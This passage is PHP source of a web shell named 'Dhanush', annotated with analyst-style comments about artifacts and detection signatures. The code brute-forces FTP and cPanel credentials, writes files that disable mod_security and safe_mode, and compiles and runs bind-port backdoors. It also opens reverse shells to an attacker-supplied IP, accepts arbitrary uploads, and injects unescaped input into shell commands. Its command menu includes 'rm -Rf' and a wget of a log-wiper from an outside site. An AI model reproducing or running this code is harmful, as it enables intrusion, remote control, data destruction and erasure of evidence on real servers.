// Request dispatcher for the page's actions. It is one if/else-if chain, so exactly one branch
// runs per request, in the order written. Helpers execmd(), exec_all(), ftp_check(),
// cpanel_check(), paramexe(), download(), getDisabledFunctions() and safe() are defined elsewhere
// in the file (not in view); $os, $dir and $directorysperator are set earlier.
// ?downloadit: archives the current directory with tar and streams the archive back.
if(isset($_GET["downloadit"]))
{
 $FolderToCompress = getcwd();
 // getcwd() is interpolated unquoted into the shell command. backup.tar is written into the
 // working directory and is not removed afterwards (on-disk artifact of this action).
 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");

 // The loop only ever leaves $nfd equal to the last path segment, i.e. "backup.tar".
 $prd=explode("/","backup.tar");
 for($i=0;$i<sizeof($prd);$i++)
 {
 $nfd=$prd[$i];
 }
 @ob_clean();
 header("Content-type: application/octet-stream");
 header("Content-length: ".filesize($nfd));
 header("Content-disposition: attachment; filename=\"".$nfd."\";");
 readfile($nfd);
 exit;
}
//Turn Safe Mode Off

 // Not tied to any request parameter: this runs on every page load where disabled functions are
 // reported or safe_mode is not "OFF", and because the chain continues with `else if`, every
 // action branch below is skipped on such a request. It writes three files into the working
 // directory -- .htaccess (mod_security filter directives), ini.php (a script that include()s
 // $_GET["file"] and $_GET["ss"] straight from the request) and php.ini -- and only closes the
 // last handle. Those three file names are the on-disk artifacts to look for.
 if(getDisabledFunctions() != "None" || safe() != "OFF")
 {
 $file_pointer = fopen(".htaccess", "w+");
 fwrite($file_pointer, "<IfModule mod_security.c>
 SecFilterEngine Off
 SecFilterScanPOST Off
 </IfModule> \n\r");

 $file_pointer = fopen("ini.php", "w+");
 fwrite($file_pointer, "<?
echo ini_get(\"safe_mode\");
echo ini_get(\"open_basedir\");
include(\$_GET[\"file\"]);
ini_restore(\"safe_mode\");
ini_restore(\"open_basedir\");
echo ini_get(\"safe_mode\");
echo ini_get(\"open_basedir\");
include(\$_GET[\"ss\"]);
?>");

 $file_pointer = fopen("php.ini", "w+");
 fwrite($file_pointer, "safe_mode = Off");

 fclose($file_pointer);

 }

 // POST cpanelattack: iterates every username/password pair from the two newline-separated
 // lists against $_POST['target'] via ftp_check() / cpanel_check(). $cracktype is never assigned
 // in this branch (the checks above read $_POST['cracktype']), so $cpanel_port is always "2082";
 // $connect_timeout is not defined in view. Progress is echoed directly into the response.
 else if(isset($_POST['cpanelattack']))
 {
 if(!empty($_POST['username']) && !empty($_POST['password']))
 {
 $userlist=explode("\n",$_POST['username']);
 $passlist=explode("\n",$_POST['password']);

 if($_POST['cracktype'] == "ftp")
 {
 foreach ($userlist as $user)
 {
 $pureuser = trim($user);
 foreach ($passlist as $password )
 {
 $purepass = trim($password);
 ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
 }
 }
 }
 if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
 {
 if($cracktype == "telnet")
 $cpanel_port="23";
 else
 $cpanel_port="2082";
 foreach ($userlist as $user)
 {
 $pureuser = trim($user);

 echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
 Processing user $pureuser ...</font></b><br><br>";

 foreach ($passlist as $password )
 {
 $purepass = trim($password);
 cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);

 }
 }
 }
 }
 else
 $bdmessage = "<center>Enter Username & Password List<center>";
 }

// ?info=<value>: the value is concatenated into a shell command with no escapeshellarg().
else if(isset($_GET['info']))
{
 $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
}
// POST u (multipart upload): destination directory comes from $_REQUEST['path'] and the file
// name is taken verbatim from the client ($_FILES['uploadfile']['name']). Both OS branches build
// the identical path; $setuploadvalue and $tempName are assigned but unused.
else if(isset($_POST['u']))
{
 $path = $_REQUEST['path'];
 if(is_dir($path))
 {
 $setuploadvalue = 0;
 $uploadedFilePath = $_FILES['uploadfile']['name'];
 $tempName = $_FILES['uploadfile']['tmp_name'];
 if($os == "Windows")
 $uploadPath = $path . $directorysperator . $uploadedFilePath;
 else if($os == "Linux")
 $uploadPath = $path . $directorysperator . $uploadedFilePath;
 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
 else
 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
 }
 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
}
// POST backdoor: decodes one of the embedded blobs ($bind_port_c for lang=c, $bind_port_p for
// lang=perl) with gzinflate(base64_decode()), writes it to backp.c / bp.pl in the working
// directory (or under /tmp when "." is not writable), and starts it in the background with the
// requested port and password. For C it compiles with gcc first and then judges success by
// grepping `ps aux`. On-disk artifacts: backp.c, backp, bp.pl in cwd or /tmp.
else if(isset($_POST['backdoor']))
{
 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
 { ?><script type="text/javascript">gethome('connect');</script><?php
 $passwd = $_POST['passwd'];

 if($_POST['lang'] == 'c')
 {
 if(is_writable("."))
 {
 @$fh=fopen(getcwd()."/backp.c",'w');
 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
 @fclose($fh);
 execmd("chmod 0755 ".getcwd()."/backp.c");
 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
 execmd("chmod 0755 ".getcwd()."/backp");
 // $_POST['port'] and $passwd go into the command line unescaped.
 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
 $scan = exec_all("ps aux | grep backp".$_POST['port']);
 if(eregi("backp".$_POST['port'],$scan))
 $bdmessage = "Process found running, backdoor setup successfully.";
 else
 $bdmessage = "Process not found running, backdoor not setup successfully.";
 }
 else
 {
 @$fh=fopen("/tmp/backp.c","w");
 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
 @fclose($fh);
 execmd("chmod 0755 /tmp/backp.c");
 execmd("gcc -o /tmp/backp /tmp/backp.c");
 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
 $scan = exec_all("ps aux | grep backp".$_POST['port']);
 if(eregi("backp".$_POST['port'],$scan))
 $bdmessage = "Process found running, backdoor setup successfully.";
 else
 $bdmessage = "Process not found running, backdoor not setup successfully.";
 }
 }
 if($_POST['lang'] == 'perl')
 {
 if(is_writable("."))
 {
 @$fh=fopen(getcwd()."/bp.pl",'w');
 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
 @fclose($fh);
 execmd("chmod 0755 ".getcwd()."/bp.pl");
 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");

 // $out is never assigned in this branch, so the message embeds an undefined variable.
 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
 }
 else
 {
 // Writes /tmp/bp.pl but then chmods and runs getcwd()."/bp.pl" -- the paths do not match,
 // so this fallback operates on a file it did not write.
 @$fh=fopen("/tmp/bp.pl","w");
 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
 @fclose($fh);
 execmd("chmod 0755 ".getcwd()."/bp.pl");
 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
 }
 }
 }
}
// POST backconnect: outbound connection to $_POST['ip']:$_POST['port']. For lang=perl/python the
// embedded $backconnect_perl / $back_connect_p blob is decoded with gzuncompress(base64_decode()),
// written to bc.pl / bc.py (cwd or /tmp), run in the background and then unlinked, so the file
// is transient. For lang=php the script itself connects with fsockopen() and loops, reading one
// line at a time and passing it to exec_all() until the peer closes. $disable and $dateAndTime
// are referenced but not defined in view.
else if(isset($_POST['backconnect']))
{
 if($_POST['ip'] != "" && $_POST['port'] != "")
 { ?><script type="text/javascript">gethome('connect');</script><?php
 $host = $_POST['ip'];
 $port = $_POST['port'];
 if($_POST["lang"] == "perl")
 {
 if(is_writable("."))
 {
 @$fh=fopen(getcwd()."/bc.pl",'w');
 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
 @fclose($fh);
 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
 // $host and $port are interpolated into the command line unescaped.
 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
 }
 else
 {
 @$fh=fopen("/tmp/bc.pl","w");
 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
 @fclose($fh);
 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
 execmd("perl /tmp/bc.pl $host $port &",$disable);
 if(!@unlink("/tmp/bc.pl"))
 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
 }
 }
 else if($_POST["lang"] == "python")
 {
 if(is_writable("."))
 {
 // die(mysql_error()) on a failed fopen() is unrelated to MySQL; the @ already suppresses
 // the warning, and the if($w_file) guard below makes the die() unreachable anyway.
 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
 if($w_file)
 {
 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
 @fclose($w_file);
 chmod(getcwd().'/bc.py', 0777);
 }
 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";

 if(!@unlink(getcwd()."/bc.py"))
 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
 }
 else
 {
 $w_file=@fopen("/tmp/bc.py","w");
 if($w_file)
 {
 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
 @fclose($w_file);
 chmod('/tmp/bc.py', 0777);
 }
 execmd("python /tmp/bc.py $host $port &",$disable);
 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
 if(!@unlink("/tmp/bc.py"))
 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
 }
 }
 else if($_POST["lang"] == "php")
 {
 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
 $ip = $_POST['ip'];
 $port=$_POST['port'];
 $sockfd=fsockopen($ip , $port , $errno, $errstr );
 // $errno is tested before $sockfd; the !$sockfd branch assigns $result, which is never
 // displayed ($bdmessage is what the page shows).
 if($errno != 0)
 {
 $bdmessage = "<font color='red'><b>$errno</b> : $errstr</font>";
 }
 else if (!$sockfd)
 {
 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
 }
 else
 {
 // The banner, uname, pwd and id output sent first are the on-the-wire fingerprint of this
 // connection; the "(dhanush)[$]> " prompt repeats for every command.
 fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n=================================================================");
 $pwd = exec_all("pwd");
 $sysinfo = exec_all("uname -a");
 $id = exec_all("id");
 $len = 1337;
 fputs($sockfd ,$sysinfo . "\n" );
 fputs($sockfd ,$pwd . "\n" );
 fputs($sockfd ,$id ."\n\n" );
 fputs($sockfd ,$dateAndTime."\n\n" );
 while(!feof($sockfd))
 {
 $cmdPrompt ="(dhanush)[$]> ";
 fputs ($sockfd , $cmdPrompt );
 $command= fgets($sockfd, $len);
 fputs($sockfd , "\n" . exec_all($command) . "\n\n");
 }
 fclose($sockfd);
 }
 }
 }
}
// ?val1=<n>&val2=<m>: lists the passwd entry for every uid in [val1, val2] via posix_getpwuid().
// The loop increments $_GET['val1'] in place; output is rendered by paramexe() (not in view).
else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
{
 $temp = "";
 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
 {
 $uid = @posix_getpwuid($_GET['val1']);
 if ($uid)
 $temp .= join(':',$uid)."\n";
 }
 echo '<br/>';
 paramexe('Users', $temp);
}
// ?download: delegated entirely to download() (not in view).
else if(isset($_GET['download']))
{
 download();
}
// Default: load the directory listing for $dir via the client-side gethome().
else
{
 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
}
// Writability badge shown under the upload / create forms below.
$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"< not writable >";
?>
6060</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
6061<table style="width:100%;border-color:#333333;" border="1">
6062<tr>
6063<td align="center">
6064<form method="post" enctype="multipart/form-data">
6065Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
6066<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
6067<input type=submit value="Upload" name="u" value="u" class="but" ></form>
6068<span name="wrtble"><?php
6069echo $is_writable; ?></span>
6070 <br>
6071</td>
6072<td align="center" style="height:105px;">Create File :
6073<form onSubmit="createdir('Create',createfile.value);return false;">
6074<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
6075<input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
6076</form><span name="wrtble">
6077<?php echo $is_writable; ?></span>
6078</td>
6079</tr>
6080<tr>
6081<td align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
6082<input type="text" class="box" name="execute">
6083<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
6084 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
6085
6086<td align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
6087<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
6088<input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
6089</form><span name="wrtble"><?php
6090echo $is_writable;
6091?></span></td></tr>
6092<tr><td style="height:105px;" align="center">Get Exploit <form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
6093<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
6094<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
6095<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
6096<select name="functiontype" class="sbox">
6097<option value="wwget">wget</option>
6098<option value="wlynx">lynx</option>
6099<option value="wfread">fread</option>
6100<option value="wfetch">fetch</option>
6101<option value="wlinks">links</option>
6102<option value="wget">GET</option>
6103<option value="wcurl">curl</option>
6104</select>
6105</form><div id="showexp"></div>
6106</td>
6107<td align="center">
6108<form>
6109Some Commands<br>
6110<?php if($os != "Windows")
6111{ ?>
6112<SELECT NAME="mycmd" class="box">
6113 <OPTION VALUE="uname -a">Kernel version
6114 <OPTION VALUE="w">Logged in users
6115 <OPTION VALUE="lastlog">Last to connect
6116 <option value='cat /etc/hosts'>IP Addresses
6117 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
6118 <OPTION VALUE="logeraser">Log Eraser
6119 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
6120 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
6121 <OPTION VALUE="find / -type f -name \"config*\"">find config* files
6122 <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
6123 <OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in current dir
6124 <OPTION VALUE="find / -type f -perm -04000 -ls">find all suid files
6125 <OPTION VALUE="find / -user root -perm -022">find all sgid files
6126 <OPTION VALUE="find . -type f -perm -02000 -ls">find suid files in current dir
6127 <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
6128 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
6129 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
6130 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
6131 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
6132 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
6133 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
6134 <OPTION VALUE="ps aux">Show running proccess
6135 <OPTION VALUE="uptime">Uptime check
6136 <OPTION VALUE="cat /proc/meminfo">Memory check
6137 <OPTION VALUE="netstat -an | grep -i listen">Open ports
6138 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
6139 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
6140 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
6141 <OPTION VALUE="./zap2">WIPELOGS PT3
6142 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
6143 </SELECT>
6144 <?php } else {?>
6145 <SELECT NAME="mycmd" class="box">
6146 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
6147 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
6148 <OPTION VALUE="systeminfo">System Informations
6149 <OPTION VALUE="net user">User accounts
6150 <OPTION VALUE="netstat -an">Open ports
6151 <OPTION VALUE="getmac">Get Mac Address
6152 <OPTION VALUE="net start">Show running services
6153 <OPTION VALUE="net view">Show computers
6154 <OPTION VALUE="arp -a">ARP Table
6155 <OPTION VALUE="tasklist">Show Process
6156 <OPTION VALUE="ipconfig/all">IP Configuration
6157
6158 </SELECT>
6159 <?php } ?>
6160 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
6161<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
6162</form>
6163</td>
6164</tr></table><br>
6165
6166</td>
6167</tr>
6168</table>
6169
6170<?php
6171
6172
6173//logout
6174
6175if(isset($_GET['logout']))
6176{
6177 setcookie("hacked",time() - 60*60);
6178 header("Location:$self");
6179 ob_end_flush();
6180}
6181?>
6182
6183
6184<hr color="#1B1B1B">
6185<div align="center">
6186<font size="6" face="Times New Roman, Times, serif" color="#00CC00">धनुष<br>
6187--==Coded By Arjun==--</font><br><a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font color="#FF0000" size="6">जय हिन्द</font></a></div>
6188<?php
6189}
6190}
6191
6192if(isset($_POST['uname']) && isset($_POST['passwd']))
6193{
 // Login handler: the submitted form fields are compared against the
 // hard-coded $user / $pass values set earlier in this file, using loose
 // (==) string comparison rather than a strict or constant-time check.
 if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
 {
 // Session state is a single cookie named "hacked" whose value is the
 // unsalted md5 of the static password, with no expiry argument (browser
 // session cookie). Both the cookie name and its fixed value are usable
 // as a detection signature for this shell in proxy/WAF logs.
 setcookie("hacked", md5($pass));
 // Redirects back to this script. $_SERVER["PHP_SELF"] is reflected into
 // the Location header unescaped, and no exit() follows, so the remainder
 // of the file still executes (and emits output) after the header is set.
 $selfenter = $_SERVER["PHP_SELF"];
 header("Location:$selfenter");
 }
}
6201
6202if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
6203{
 // Authentication gate: when the "hacked" cookie is missing or does not
 // loosely (!=) equal md5($pass), the login page below is rendered instead
 // of the shell UI. The expected value depends only on the static password,
 // so it is identical across every request and every deployment of the
 // same file.
 // shellstyle() is defined elsewhere in this file (not visible here);
 // presumably it emits the shared page styling -- confirm against its body.
 shellstyle();
 // The markup that follows carries fixed strings ("Dhanush", "Coded By
 // Arjun") and a reference to a local image file,
 // Windows_7_-_Alien_from_outer_space.jpg, all of which are stable
 // identifiers for this shell's login page in crawled or captured content.
?>
6206 <center>
6207 <form method="POST">
6208 <div style="background-color:#171717; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
6209 <table cellpadding="9" cellspacing="4">
6210 <tr>
6211 <td align="center" colspan="2"><blink><font size="7"><b>Dhanush</b></font></blink></td>
6212 </tr>
6213 <tr>
6214 <td align="right"><b>User Name : </b></td>
6215 <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6216 </tr>
6217 <tr>
6218 <td align="right"><b>Password : </b></td>
6219 <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6220 </tr>
6221 <tr>
6222 <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
6223 </tr>
6224 <tr>
6225 <td align="center" colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Arjun==--</b></font></td>
6226 </tr>
6227 <tr>
6228 <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
6229 </tr>
6230 </table>
6231 </div>
6232
6233 </form>
6234 </center>
6235<br>
6236</body>
6237</html>
6238<?php
// End of the login gate; no exit() here either, so any code after this
// point in the file still runs for unauthenticated requests.
6239}
6240?>